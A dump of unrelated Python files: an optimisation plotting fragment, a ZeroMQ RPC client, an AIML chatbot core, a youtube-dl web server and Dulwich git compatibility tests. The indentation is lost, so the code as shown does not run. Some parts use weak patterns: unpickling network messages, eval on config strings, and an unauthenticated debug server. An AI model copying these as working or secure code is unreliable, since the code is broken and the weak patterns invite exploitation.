optimizedFactors = numpy.array([ 6.27265804e-01, 4.54168056e+00, 5.46248338e+00, -1.87883923e+00, 1.44989168e+00, 3.79782140e-01, 5.51136641e-04, -2.47446270e-03, 1.14398554e+00, 2.64094296e-03, -2.12394170e-03, -2.48873856e-03, -9.11841469e-04, 7.13814468e-01, -1.06753076e+00, 2.37556547e+00, 1.97917698e+00, -2.62286481e+00])
'''
print 'OPTIMIZATION FINISHED!!!!!!'
print optimizedFactors
#bestScoreTransList = getBestTranslations(my_optimization.x)
#import matplotlib as mpl
#from mpl_toolkits.mplot3d import Axes3D
#import matplotlib.pyplot as plt
#fig = plt.figure(1)
#fig.clf()
#ax = Axes3D(fig)
#print bestScoreTransList
#p=ax.scatter(bestScoreTransList[:,0],bestScoreTransList[:,1],bestScoreTransList[:,2],c=bestScoreTransList[:,3])
#fig.colorbar(p)
#plt.show()
import pylab
finalScoreListDict = scoreAll(optimizedFactors)
finalScoreList = []
for key in finalScoreListDict:
finalScoreList.extend(finalScoreListDict[key])
#print finalScoreList
#distScoreList = numpy.array([[numpy.sqrt((i[0]**2)+(i[1]**2)+(i[2]**2)),i[7]] for i in finalScoreList])
#distScoreList = numpy.array([[numpy.sqrt((i[0]**2)+(i[1]**2)+(i[2]**2)) + (0.5*numpy.random.random())-0.25,i[7]] for i in finalScoreList])
distScoreList = numpy.array([[numpy.sqrt((i[0]**2)+(i[1]**2)+(i[2]**2)) + (1-abs(i[3])), i[7]] for i in finalScoreList])
pylab.scatter(distScoreList[:,0], distScoreList[:,1], color='black', s=3)
#for ligand in ligands:
for row in finalScoreList:
if row[0] == 0 and row[1] == 0 and row[2] == 0 and tuple(row[3:7]) in minRotation.values():
pylab.scatter([0],[row[7]], color='r', s=100)
h, xedges, yedges = numpy.histogram2d(distScoreList[:,0], distScoreList[:,1], bins=50)
pylab.imshow(h.T, extent=[xedges[0], xedges[-1], yedges[0], yedges[-1]],
interpolation = 'nearest',
aspect = 'auto',
origin = 'lower')
pylab.savefig('test.pdf')
pylab.show()
|
client.py
|
import threading
from datetime import datetime
from functools import lru_cache
from typing import Any
import zmq
from zmq.backend.cython.constants import NOBLOCK
from .common import HEARTBEAT_TOPIC, HEARTBEAT_TOLERANCE
class RemoteException(Exception):
"""
RPC remote exception
"""
def __init__(self, value: Any) -> None:
"""
Constructor
"""
self._value = value
def __str__(self) -> str:
"""
Output error message
"""
return self._value
class RpcClient:
""""""
def __init__(self) -> None:
"""Constructor"""
# zmq port related
self._context: zmq.Context = zmq.Context()
# Request socket (Request–reply pattern)
self._socket_req: zmq.Socket = self._context.socket(zmq.REQ)
# Subscribe socket (Publish–subscribe pattern)
self._socket_sub: zmq.Socket = self._context.socket(zmq.SUB)
# Worker thread relate, used to process data pushed from server
self._active: bool = False # RpcClient status
self._thread: threading.Thread = None # RpcClient thread
self._lock: threading.Lock = threading.Lock()
self._last_received_ping: datetime = datetime.utcnow()
@lru_cache(100)
def __getattr__(self, name: str) -> Any:
"""
Realize remote call function
"""
# Perform remote call task
def dorpc(*args, **kwargs):
# Get timeout value from kwargs, default value is 30 seconds
if "timeout" in kwargs:
timeout = kwargs.pop("timeout")
else:
timeout = 30000
# Generate request
req: list = [name, args, kwargs]
# Send request and wait for response
with self._lock:
self._socket_req.send_pyobj(req)
# Timeout reached without any data
n: int = self._socket_req.poll(timeout)
if not n:
msg: str = f"Timeout of {timeout}ms reached for {req}"
raise RemoteException(msg)
rep = self._socket_req.recv_pyobj()
# Return response if successed; Trigger exception if failed
if rep[0]:
return rep[1]
else:
raise RemoteException(rep[1])
return dorpc
def start(
self,
req_address: str,
sub_address: str
) -> None:
"""
Start RpcClient
"""
if self._active:
return
# Connect zmq port
self._socket_req.connect(req_address)
self._socket_sub.connect(sub_address)
# Start RpcClient status
self._active = True
# Start RpcClient thread
self._thread = threading.Thread(target=self.run)
self._thread.start()
self._last_received_ping = datetime.utcnow()
def stop(self) -> None:
"""
Stop RpcClient
"""
if not self._active:
return
# Stop RpcClient status
self._active = False
def join(self) -> None:
# Wait for RpcClient thread to exit
if self._thread and self._thread.is_alive():
self._thread.join()
self._thread = None
def run(self) -> None:
"""
Run RpcClient function
"""
pull_tolerance: int = HEARTBEAT_TOLERANCE * 1000
while self._active:
if not self._socket_sub.poll(pull_tolerance):
self.on_disconnected()
continue
# Receive data from subscribe socket
topic, data = self._socket_sub.recv_pyobj(flags=NOBLOCK)
if topic == HEARTBEAT_TOPIC:
self._last_received_ping = data
else:
# Process data by callable function
self.callback(topic, data)
# Close socket
self._socket_req.close()
self._socket_sub.close()
def callback(self, topic: str, data: Any) -> None:
"""
Callable function
"""
raise NotImplementedError
def subscribe_topic(self, topic: str) -> None:
"""
Subscribe data
"""
self._socket_sub.setsockopt_string(zmq.SUBSCRIBE, topic)
def on_disconnected(self):
"""
Callback when heartbeat is lost.
"""
msg: str = f"RpcServer has no response over {HEARTBEAT_TOLERANCE} seconds, please check you connection."
print(msg)
|
core.py
|
import marshal
import os.path
import sys
import threading
import time
import traceback
import pyttsx
import re
import random
# Howie-specific
import aiml
import configFile
import frontends
from frontends import *
#import speech_recognition as sr
speech_engine = pyttsx.init('sapi5') # see http://pyttsx.readthedocs.org/en/latest/engine.html#pyttsx.init
speech_engine.setProperty('rate', 150)
class ActiveFrontEnd:
def __init__(self, inst, thread):
self._inst = inst
self._thread = thread
_frontends = {}
kernel = None
def _addFrontEnd(name, cls):
global _frontends
# verbose output
config = configFile.get()
if config['cla.verboseMode'] in ["yes", "y", "true"]:
print "Creating %s front-end using class %s" % (name, cls)
# Instantiate the frontend object
feInst = eval("%s.%s()" % (name, cls))
# Create a thread to run this frontend
feThread = threading.Thread(name=name, target=feInst.go)
feThread.setDaemon(True)
feThread.start()
_frontends[name] = ActiveFrontEnd(feInst, feThread)
def init():
global kernel
"Initialize the front-ends and back-ends."
# Fetch the configuration info
config = configFile.get()
# Initialize the AIML interpreter
print "Initializing AIML interpreter (please be patient)..."
kernel = aiml.Kernel()
#extract config options
try: verbose = config["general.verbose"] == "yes" or config["cla.verboseMode"] == "yes"
except: verbose = False
try: botName = config["general.botname"]
except: botName = "Nameless"
try: botMaster = config["general.botmaster"]
except: botMaster = "The Master"
try: sessionsPersist = config["general.sessionspersist"].lower() in ["yes", "y", "true"]
except: sessionsPersist = False
try: sessionsDir = config["general.sessionsdir"]
except: sessionsDir = "sessions"
# set up the kernel
kernel.verbose(verbose)
kernel.setPredicate("secure", "yes") # secure the global session
kernel.bootstrap(learnFiles="std-startup.xml", commands="bootstrap")
kernel.setPredicate("secure", "no") # and unsecure it.
# Initialize bot predicates
print 'initializing bot predicates'
for k,v in config.items():
if k[:8] != "botinfo.":
continue
kernel.setBotPredicate(k[8:], v)
# Load persistent session data, if necessary
if sessionsPersist:
try:
for session in os.listdir(sessionsDir):
# Session files are named "user@protocol.ses", where
# user@protocol is also the internal name of the session.
root, ext = os.path.splitext(session)
if ext != ".ses":
# This isn't a session file.
continue
# Load the contents of the session file (a single dictionary
# containing all the predicates for this session).
if verbose: print "Loading session:", root
f = file("%s/%s" %(sessionsDir, session), "rb")
d = marshal.load(f)
f.close()
# update the predicate values in the Kernel.
for k,v in d.items():
kernel.setPredicate(k,v,root)
except OSError:
print "WARNING: Error loading session data from", sessionsDir
# Handle local mode: only start the tty frontend
if config['cla.localMode'].lower() in ["yes", "y", "true"]:
#print 'config local mode'
try: _addFrontEnd("tty", "FrontEndTTY")
except:
print "ERROR initializing frontend class frontends.tty.FrontEndTTY"
traceback.print_tb(sys.exc_info()[2])
else:
#print 'Initializing the front-ends'
# Initialize the front-ends. Pythonic black magic ensues...
# First we iterate over all frontend modules.
for fe in frontends.__all__:
# If this frontend isn't activated in the configuration file,
# ignore it.
try: isActive = (config["%s.active" % fe].lower() in ["yes", "y", "true"])
except KeyError:
print "WARNING: no 'active' entry found for module %s in configuration file." % fe
isActive = False
if not isActive:
if config['cla.verboseMode'] == 'yes':
print "Skipping inactive frontend: %s" % fe
continue
# Attempt to extract the name of the front-end class defined in this module.
# If no such class is defined, or if the class is not a subclass of IFrontEnd,
# skip this module.
try:
#print 'evaluating frontends'
cls = eval("frontends.%s.frontEndClass" % fe)
#print 'evaluated frontends'
if not issubclass(eval("frontends.%s.%s" % (fe, cls)), frontends.frontend.IFrontEnd):
continue
except AttributeError:
# no valid front-end class defined in this file.
print "WARNING: could not find valid front-end class in module %s" % fe
continue
# Create an instance of this class in the _frontends dictionary
try: _addFrontEnd(fe, cls)
except:
# raise # uncomment for details on error
print "ERROR initializing frontend class frontends.%s.%s" % (fe,cls)
traceback.print_tb(sys.exc_info()[2])
continue
def speak(text):
speech_engine.say(text)
speech_engine.runAndWait()
def submit(input, session):
#print 'will submit response'
"Submits a statement to the back-end. Returns the response to the statement."
response = kernel.respond(input, session)
#res=str(response)
#print(response)
#print 'kai horas'
#speak('what is happening')
#print 'kai hoyes'
config = configFile.get()
# if logging is enabled, write the input and response to the log.
try:
#print 'log'
if config["general.logging"].lower() in ["yes", "y", "true"]:
#print 'bhithar'
logdir = config["general.logdir"]
if not os.path.isdir(logdir): os.mkdir(logdir)
logfile = file("%s/%s.log" % (logdir, session), "a")
logfile.write(time.strftime("[%m/%d/%Y %H:%M:%S]\n"))
logfile.write("%s: %s\n" % (session, input))
logfile.write("%s: %s\n" % (kernel.getBotPredicate("name"), response))
#print(logfile)
logfile.close()
except KeyError:
pass
# If persistent sessions are enabled, store the session data.
try:
if config["general.sessionspersist"].lower() in ["yes", "y", "true"]:
print 'session'
sessionsdir = config["general.sessionsdir"]
if not os.path.isdir(sessionsdir): os.mkdir(sessionsdir)
sessionfile = file("%s/%s.ses" % (sessionsdir, session), "wb")
marshal.dump(kernel.getSessionData(session), sessionfile)
sessionfile.close()
except KeyError:
pass
#speak('gos')
#print 'seri'
return response
|
youtube-dl-server.py
|
from __future__ import unicode_literals
import json
import os
import subprocess
from queue import Queue
from bottle import route, run, Bottle, request, static_file
from threading import Thread
import youtube_dl
from pathlib import Path
from collections import ChainMap
app = Bottle()
app_defaults = {
'YDL_FORMAT': 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]',
'YDL_EXTRACT_AUDIO_FORMAT': None,
'YDL_EXTRACT_AUDIO_QUALITY': '192',
'YDL_RECODE_VIDEO_FORMAT': None,
'YDL_OUTPUT_TEMPLATE': '/youtube-dl/%(title)s [%(id)s].%(ext)s',
'YDL_ARCHIVE_FILE': None,
'YDL_SERVER_HOST': '0.0.0.0',
'YDL_SERVER_PORT': 8080,
'YDL_PROXY': None,
}
@app.route('/youtube-dl')
def dl_queue_list():
return static_file('index.html', root='./')
@app.route('/youtube-dl/static/:filename#.*#')
def server_static(filename):
return static_file(filename, root='./static')
@app.route('/youtube-dl/q', method='GET')
def q_size():
return {"success": True, "size": json.dumps(list(dl_q.queue))}
@app.route('/youtube-dl/q', method='POST')
def q_put():
url = request.forms.get("url")
options = {
'format': request.forms.get("format")
}
if not url:
return {"success": False, "error": "/q called without a 'url' query param"}
dl_q.put((url, options))
print("Added url " + url + " to the download queue")
return {"success": True, "url": url, "options": options}
def dl_worker():
while not done:
url, options = dl_q.get()
download(url, options)
dl_q.task_done()
def get_ydl_options(request_options):
request_vars = {
'YDL_EXTRACT_AUDIO_FORMAT': None,
'YDL_RECODE_VIDEO_FORMAT': None,
}
requested_format = request_options.get('format', 'bestvideo')
if requested_format in ['aac', 'flac', 'mp3', 'm4a', 'opus', 'vorbis', 'wav']:
request_vars['YDL_EXTRACT_AUDIO_FORMAT'] = requested_format
elif requested_format == 'bestaudio':
request_vars['YDL_EXTRACT_AUDIO_FORMAT'] = 'best'
elif requested_format in ['mp4', 'flv', 'webm', 'ogg', 'mkv', 'avi']:
request_vars['YDL_RECODE_VIDEO_FORMAT'] = requested_format
ydl_vars = ChainMap(request_vars, os.environ, app_defaults)
postprocessors = []
if(ydl_vars['YDL_EXTRACT_AUDIO_FORMAT']):
postprocessors.append({
'key': 'FFmpegExtractAudio',
'preferredcodec': ydl_vars['YDL_EXTRACT_AUDIO_FORMAT'],
'preferredquality': ydl_vars['YDL_EXTRACT_AUDIO_QUALITY'],
})
if(ydl_vars['YDL_RECODE_VIDEO_FORMAT']):
postprocessors.append({
'key': 'FFmpegVideoConvertor',
'preferedformat': ydl_vars['YDL_RECODE_VIDEO_FORMAT'],
})
ydl_options = {
'format': ydl_vars['YDL_FORMAT'],
'postprocessors': postprocessors,
'outtmpl': ydl_vars['YDL_OUTPUT_TEMPLATE'],
'download_archive': ydl_vars['YDL_ARCHIVE_FILE']
}
if ydl_vars['YDL_PROXY']:
ydl_options['proxy'] = ydl_vars['YDL_PROXY']
return ydl_options
def download(url, request_options):
with youtube_dl.YoutubeDL(get_ydl_options(request_options)) as ydl:
ydl.download([url])
dl_q = Queue()
done = False
dl_thread = Thread(target=dl_worker)
dl_thread.start()
print("Started download thread")
app_vars = ChainMap(os.environ, app_defaults)
app.run(host=app_vars['YDL_SERVER_HOST'], port=app_vars['YDL_SERVER_PORT'], debug=True)
done = True
dl_thread.join()
|
test_client.py
|
# test_client.py -- Compatibilty tests for git client.
# Copyright (C) 2010 Google, Inc.
#
# Dulwich is dual-licensed under the Apache License, Version 2.0 and the GNU
# General Public License as public by the Free Software Foundation; version 2.0
# or (at your option) any later version. You can redistribute it and/or
# modify it under the terms of either of these two licenses.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# You should have received a copy of the licenses; if not, see
# <http://www.gnu.org/licenses/> for a copy of the GNU General Public License
# and <http://www.apache.org/licenses/LICENSE-2.0> for a copy of the Apache
# License, Version 2.0.
#
"""Compatibilty tests between the Dulwich client and the cgit server."""
import copy
from io import BytesIO
import os
import select
import signal
import stat
import subprocess
import sys
import tarfile
import tempfile
import threading
from urllib.parse import unquote
import http.server
from dulwich import (
client,
file,
index,
protocol,
objects,
repo,
)
from dulwich.tests import (
SkipTest,
expectedFailure,
)
from dulwich.tests.compat.utils import (
CompatTestCase,
check_for_daemon,
import_repo_to_dir,
rmtree_ro,
run_git_or_fail,
_DEFAULT_GIT,
)
if sys.platform == "win32":
import ctypes
class DulwichClientTestBase(object):
"""Tests for client/server compatibility."""
def setUp(self):
self.gitroot = os.path.dirname(
import_repo_to_dir("server_new.export").rstrip(os.sep)
)
self.dest = os.path.join(self.gitroot, "dest")
file.ensure_dir_exists(self.dest)
run_git_or_fail(["init", "--quiet", "--bare"], cwd=self.dest)
def tearDown(self):
rmtree_ro(self.gitroot)
def assertDestEqualsSrc(self):
repo_dir = os.path.join(self.gitroot, "server_new.export")
dest_repo_dir = os.path.join(self.gitroot, "dest")
with repo.Repo(repo_dir) as src:
with repo.Repo(dest_repo_dir) as dest:
self.assertReposEqual(src, dest)
def _client(self):
raise NotImplementedError()
def _build_path(self):
raise NotImplementedError()
def _do_send_pack(self):
c = self._client()
srcpath = os.path.join(self.gitroot, "server_new.export")
with repo.Repo(srcpath) as src:
sendrefs = dict(src.get_refs())
del sendrefs[b"HEAD"]
c.send_pack(
self._build_path("/dest"),
lambda _: sendrefs,
src.generate_pack_data,
)
def test_send_pack(self):
self._do_send_pack()
self.assertDestEqualsSrc()
def test_send_pack_nothing_to_send(self):
self._do_send_pack()
self.assertDestEqualsSrc()
# nothing to send, but shouldn't raise either.
self._do_send_pack()
@staticmethod
def _add_file(repo, tree_id, filename, contents):
tree = repo[tree_id]
blob = objects.Blob()
blob.data = contents.encode("utf-8")
repo.object_store.add_object(blob)
tree.add(filename.encode("utf-8"), stat.S_IFREG | 0o644, blob.id)
repo.object_store.add_object(tree)
return tree.id
def test_send_pack_from_shallow_clone(self):
c = self._client()
server_new_path = os.path.join(self.gitroot, "server_new.export")
run_git_or_fail(["config", "http.uploadpack", "true"], cwd=server_new_path)
run_git_or_fail(["config", "http.receivepack", "true"], cwd=server_new_path)
remote_path = self._build_path("/server_new.export")
with repo.Repo(self.dest) as local:
result = c.fetch(remote_path, local, depth=1)
for r in result.refs.items():
local.refs.set_if_equals(r[0], None, r[1])
tree_id = local[local.head()].tree
for filename, contents in [
("bar", "bar contents"),
("zop", "zop contents"),
]:
tree_id = self._add_file(local, tree_id, filename, contents)
commit_id = local.do_commit(
message=b"add " + filename.encode("utf-8"),
committer=b"Joe Example <joe@example.com>",
tree=tree_id,
)
sendrefs = dict(local.get_refs())
del sendrefs[b"HEAD"]
c.send_pack(remote_path, lambda _: sendrefs, local.generate_pack_data)
with repo.Repo(server_new_path) as remote:
self.assertEqual(remote.head(), commit_id)
def test_send_without_report_status(self):
c = self._client()
c._send_capabilities.remove(b"report-status")
srcpath = os.path.join(self.gitroot, "server_new.export")
with repo.Repo(srcpath) as src:
sendrefs = dict(src.get_refs())
del sendrefs[b"HEAD"]
c.send_pack(
self._build_path("/dest"),
lambda _: sendrefs,
src.generate_pack_data,
)
self.assertDestEqualsSrc()
def make_dummy_commit(self, dest):
b = objects.Blob.from_string(b"hi")
dest.object_store.add_object(b)
t = index.commit_tree(dest.object_store, [(b"hi", b.id, 0o100644)])
c = objects.Commit()
c.author = c.committer = b"Foo Bar <foo@example.com>"
c.author_time = c.commit_time = 0
c.author_timezone = c.commit_timezone = 0
c.message = b"hi"
c.tree = t
dest.object_store.add_object(c)
return c.id
def disable_ff_and_make_dummy_commit(self):
# disable non-fast-forward pushes to the server
dest = repo.Repo(os.path.join(self.gitroot, "dest"))
run_git_or_fail(
["config", "receive.denyNonFastForwards", "true"], cwd=dest.path
)
commit_id = self.make_dummy_commit(dest)
return dest, commit_id
def compute_send(self, src):
sendrefs = dict(src.get_refs())
del sendrefs[b"HEAD"]
return sendrefs, src.generate_pack_data
def test_send_pack_one_error(self):
dest, dummy_commit = self.disable_ff_and_make_dummy_commit()
dest.refs[b"refs/heads/master"] = dummy_commit
repo_dir = os.path.join(self.gitroot, "server_new.export")
with repo.Repo(repo_dir) as src:
sendrefs, gen_pack = self.compute_send(src)
c = self._client()
result = c.send_pack(
self._build_path("/dest"), lambda _: sendrefs, gen_pack
)
self.assertEqual(
{
b"refs/heads/branch": None,
b"refs/heads/master": "non-fast-forward",
},
result.ref_status,
)
def test_send_pack_multiple_errors(self):
dest, dummy = self.disable_ff_and_make_dummy_commit()
# set up for two non-ff errors
branch, master = b"refs/heads/branch", b"refs/heads/master"
dest.refs[branch] = dest.refs[master] = dummy
repo_dir = os.path.join(self.gitroot, "server_new.export")
with repo.Repo(repo_dir) as src:
sendrefs, gen_pack = self.compute_send(src)
c = self._client()
result = c.send_pack(
self._build_path("/dest"), lambda _: sendrefs, gen_pack
)
self.assertEqual(
{branch: "non-fast-forward", master: "non-fast-forward"},
result.ref_status,
)
def test_archive(self):
c = self._client()
f = BytesIO()
c.archive(self._build_path("/server_new.export"), b"HEAD", f.write)
f.seek(0)
tf = tarfile.open(fileobj=f)
self.assertEqual(["baz", "foo"], tf.getnames())
def test_fetch_pack(self):
c = self._client()
with repo.Repo(os.path.join(self.gitroot, "dest")) as dest:
result = c.fetch(self._build_path("/server_new.export"), dest)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
self.assertDestEqualsSrc()
def test_fetch_pack_depth(self):
c = self._client()
with repo.Repo(os.path.join(self.gitroot, "dest")) as dest:
result = c.fetch(self._build_path("/server_new.export"), dest, depth=1)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
self.assertEqual(
dest.get_shallow(),
set(
[
b"35e0b59e187dd72a0af294aedffc213eaa4d03ff",
b"514dc6d3fbfe77361bcaef320c4d21b72bc10be9",
]
),
)
def test_repeat(self):
c = self._client()
with repo.Repo(os.path.join(self.gitroot, "dest")) as dest:
result = c.fetch(self._build_path("/server_new.export"), dest)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
self.assertDestEqualsSrc()
result = c.fetch(self._build_path("/server_new.export"), dest)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
self.assertDestEqualsSrc()
def test_fetch_empty_pack(self):
c = self._client()
with repo.Repo(os.path.join(self.gitroot, "dest")) as dest:
result = c.fetch(self._build_path("/server_new.export"), dest)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
self.assertDestEqualsSrc()
def dw(refs):
return list(refs.values())
result = c.fetch(
self._build_path("/server_new.export"),
dest,
determine_wants=dw,
)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
self.assertDestEqualsSrc()
def test_incremental_fetch_pack(self):
self.test_fetch_pack()
dest, dummy = self.disable_ff_and_make_dummy_commit()
dest.refs[b"refs/heads/master"] = dummy
c = self._client()
repo_dir = os.path.join(self.gitroot, "server_new.export")
with repo.Repo(repo_dir) as dest:
result = c.fetch(self._build_path("/dest"), dest)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
self.assertDestEqualsSrc()
def test_fetch_pack_no_side_band_64k(self):
c = self._client()
c._fetch_capabilities.remove(b"side-band-64k")
with repo.Repo(os.path.join(self.gitroot, "dest")) as dest:
result = c.fetch(self._build_path("/server_new.export"), dest)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
self.assertDestEqualsSrc()
def test_fetch_pack_zero_sha(self):
# zero sha1s are already present on the client, and should
# be ignored
c = self._client()
with repo.Repo(os.path.join(self.gitroot, "dest")) as dest:
result = c.fetch(
self._build_path("/server_new.export"),
dest,
lambda refs: [protocol.ZERO_SHA],
)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
def test_send_remove_branch(self):
with repo.Repo(os.path.join(self.gitroot, "dest")) as dest:
dummy_commit = self.make_dummy_commit(dest)
dest.refs[b"refs/heads/master"] = dummy_commit
dest.refs[b"refs/heads/abranch"] = dummy_commit
sendrefs = dict(dest.refs)
sendrefs[b"refs/heads/abranch"] = b"00" * 20
del sendrefs[b"HEAD"]
def gen_pack(have, want, ofs_delta=False):
return 0, []
c = self._client()
self.assertEqual(dest.refs[b"refs/heads/abranch"], dummy_commit)
c.send_pack(self._build_path("/dest"), lambda _: sendrefs, gen_pack)
self.assertFalse(b"refs/heads/abranch" in dest.refs)
def test_send_new_branch_empty_pack(self):
with repo.Repo(os.path.join(self.gitroot, "dest")) as dest:
dummy_commit = self.make_dummy_commit(dest)
dest.refs[b"refs/heads/master"] = dummy_commit
dest.refs[b"refs/heads/abranch"] = dummy_commit
sendrefs = {b"refs/heads/bbranch": dummy_commit}
def gen_pack(have, want, ofs_delta=False):
return 0, []
c = self._client()
self.assertEqual(dest.refs[b"refs/heads/abranch"], dummy_commit)
c.send_pack(self._build_path("/dest"), lambda _: sendrefs, gen_pack)
self.assertEqual(dummy_commit, dest.refs[b"refs/heads/abranch"])
def test_get_refs(self):
c = self._client()
refs = c.get_refs(self._build_path("/server_new.export"))
repo_dir = os.path.join(self.gitroot, "server_new.export")
with repo.Repo(repo_dir) as dest:
self.assertDictEqual(dest.refs.as_dict(), refs)
class DulwichTCPClientTest(CompatTestCase, DulwichClientTestBase):
def setUp(self):
CompatTestCase.setUp(self)
DulwichClientTestBase.setUp(self)
if check_for_daemon(limit=1):
raise SkipTest(
"git-daemon was already running on port %s" % protocol.TCP_GIT_PORT
)
fd, self.pidfile = tempfile.mkstemp(
prefix="dulwich-test-git-client", suffix=".pid"
)
os.fdopen(fd).close()
args = [
_DEFAULT_GIT,
"daemon",
"--verbose",
"--export-all",
"--pid-file=%s" % self.pidfile,
"--base-path=%s" % self.gitroot,
"--enable=receive-pack",
"--enable=upload-archive",
"--listen=localhost",
"--reuseaddr",
self.gitroot,
]
self.process = subprocess.Popen(
args,
cwd=self.gitroot,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
if not check_for_daemon():
raise SkipTest("git-daemon failed to start")
def tearDown(self):
with open(self.pidfile) as f:
pid = int(f.read().strip())
if sys.platform == "win32":
PROCESS_TERMINATE = 1
handle = ctypes.windll.kernel32.OpenProcess(PROCESS_TERMINATE, False, pid)
ctypes.windll.kernel32.TerminateProcess(handle, -1)
ctypes.windll.kernel32.CloseHandle(handle)
else:
try:
os.kill(pid, signal.SIGKILL)
os.unlink(self.pidfile)
except (OSError, IOError):
pass
self.process.wait()
self.process.stdout.close()
self.process.stderr.close()
DulwichClientTestBase.tearDown(self)
CompatTestCase.tearDown(self)
def _client(self):
return client.TCPGitClient("localhost")
def _build_path(self, path):
return path
if sys.platform == "win32":
@expectedFailure
def test_fetch_pack_no_side_band_64k(self):
DulwichClientTestBase.test_fetch_pack_no_side_band_64k(self)
class TestSSHVendor(object):
@staticmethod
def run_command(
host,
command,
username=None,
port=None,
password=None,
key_filename=None,
):
cmd, path = command.split(" ")
cmd = cmd.split("-", 1)
path = path.replace("'", "")
p = subprocess.Popen(
cmd + [path],
bufsize=0,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
return client.SubprocessWrapper(p)
class DulwichMockSSHClientTest(CompatTestCase, DulwichClientTestBase):
def setUp(self):
CompatTestCase.setUp(self)
DulwichClientTestBase.setUp(self)
self.real_vendor = client.get_ssh_vendor
client.get_ssh_vendor = TestSSHVendor
def tearDown(self):
DulwichClientTestBase.tearDown(self)
CompatTestCase.tearDown(self)
client.get_ssh_vendor = self.real_vendor
def _client(self):
return client.SSHGitClient("localhost")
def _build_path(self, path):
return self.gitroot + path
class DulwichSubprocessClientTest(CompatTestCase, DulwichClientTestBase):
def setUp(self):
CompatTestCase.setUp(self)
DulwichClientTestBase.setUp(self)
def tearDown(self):
DulwichClientTestBase.tearDown(self)
CompatTestCase.tearDown(self)
def _client(self):
return client.SubprocessGitClient()
def _build_path(self, path):
return self.gitroot + path
class GitHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
"""HTTP Request handler that calls out to 'git http-backend'."""
# Make rfile unbuffered -- we need to read one line and then pass
# the rest to a subprocess, so we can't use buffered input.
rbufsize = 0
def do_POST(self):
self.run_backend()
def do_GET(self):
self.run_backend()
def send_head(self):
return self.run_backend()
def log_request(self, code="-", size="-"):
# Let's be quiet, the test suite is noisy enough already
pass
def run_backend(self): # noqa: C901
"""Call out to git http-backend."""
# Based on CGIHTTPServer.CGIHTTPRequestHandler.run_cgi:
# Copyright (c) 2001-2010 Python Software Foundation;
# All Rights Reserved
# Licensed under the Python Software Foundation License.
rest = self.path
# find an explicit query string, if present.
i = rest.rfind("?")
if i >= 0:
rest, query = rest[:i], rest[i + 1 :]
else:
query = ""
env = copy.deepcopy(os.environ)
env["SERVER_SOFTWARE"] = self.version_string()
env["SERVER_NAME"] = self.server.server_name
env["GATEWAY_INTERFACE"] = "CGI/1.1"
env["SERVER_PROTOCOL"] = self.protocol_version
env["SERVER_PORT"] = str(self.server.server_port)
env["GIT_PROJECT_ROOT"] = self.server.root_path
env["GIT_HTTP_EXPORT_ALL"] = "1"
env["REQUEST_METHOD"] = self.command
uqrest = unquote(rest)
env["PATH_INFO"] = uqrest
env["SCRIPT_NAME"] = "/"
if query:
env["QUERY_STRING"] = query
host = self.address_string()
if host != self.client_address[0]:
env["REMOTE_HOST"] = host
env["REMOTE_ADDR"] = self.client_address[0]
authorization = self.headers.get("authorization")
if authorization:
authorization = authorization.split()
if len(authorization) == 2:
import base64
import binascii
env["AUTH_TYPE"] = authorization[0]
if authorization[0].lower() == "basic":
try:
authorization = base64.decodestring(authorization[1])
except binascii.Error:
pass
else:
authorization = authorization.split(":")
if len(authorization) == 2:
env["REMOTE_USER"] = authorization[0]
# XXX REMOTE_IDENT
content_type = self.headers.get("content-type")
if content_type:
env["CONTENT_TYPE"] = content_type
length = self.headers.get("content-length")
if length:
env["CONTENT_LENGTH"] = length
referer = self.headers.get("referer")
if referer:
env["HTTP_REFERER"] = referer
accept = []
for line in self.headers.getallmatchingheaders("accept"):
if line[:1] in "\t\n\r ":
accept.append(line.strip())
else:
accept = accept + line[7:].split(",")
env["HTTP_ACCEPT"] = ",".join(accept)
ua = self.headers.get("user-agent")
if ua:
env["HTTP_USER_AGENT"] = ua
co = self.headers.get("cookie")
if co:
env["HTTP_COOKIE"] = co
# XXX Other HTTP_* headers
# Since we're setting the env in the parent, provide empty
# values to override previously set values
for k in (
"QUERY_STRING",
"REMOTE_HOST",
"CONTENT_LENGTH",
"HTTP_USER_AGENT",
"HTTP_COOKIE",
"HTTP_REFERER",
):
env.setdefault(k, "")
self.wfile.write(b"HTTP/1.1 200 Script output follows\r\n")
self.wfile.write(("Server: %s\r\n" % self.server.server_name).encode("ascii"))
self.wfile.write(("Date: %s\r\n" % self.date_time_string()).encode("ascii"))
decoded_query = query.replace("+", " ")
try:
nbytes = int(length)
except (TypeError, ValueError):
nbytes = 0
if self.command.lower() == "post" and nbytes > 0:
data = self.rfile.read(nbytes)
else:
data = None
env["CONTENT_LENGTH"] = "0"
# throw away additional data [see bug #427345]
while select.select([self.rfile._sock], [], [], 0)[0]:
if not self.rfile._sock.recv(1):
break
args = ["http-backend"]
if "=" not in decoded_query:
args.append(decoded_query)
stdout = run_git_or_fail(args, input=data, env=env, stderr=subprocess.PIPE)
self.wfile.write(stdout)
class HTTPGitServer(http.server.HTTPServer):
allow_reuse_address = True
def __init__(self, server_address, root_path):
http.server.HTTPServer.__init__(self, server_address, GitHTTPRequestHandler)
self.root_path = root_path
self.server_name = "localhost"
def get_url(self):
return "http://%s:%s/" % (self.server_name, self.server_port)
class DulwichHttpClientTest(CompatTestCase, DulwichClientTestBase):
min_git_version = (1, 7, 0, 2)
def setUp(self):
CompatTestCase.setUp(self)
DulwichClientTestBase.setUp(self)
self._httpd = HTTPGitServer(("localhost", 0), self.gitroot)
self.addCleanup(self._httpd.shutdown)
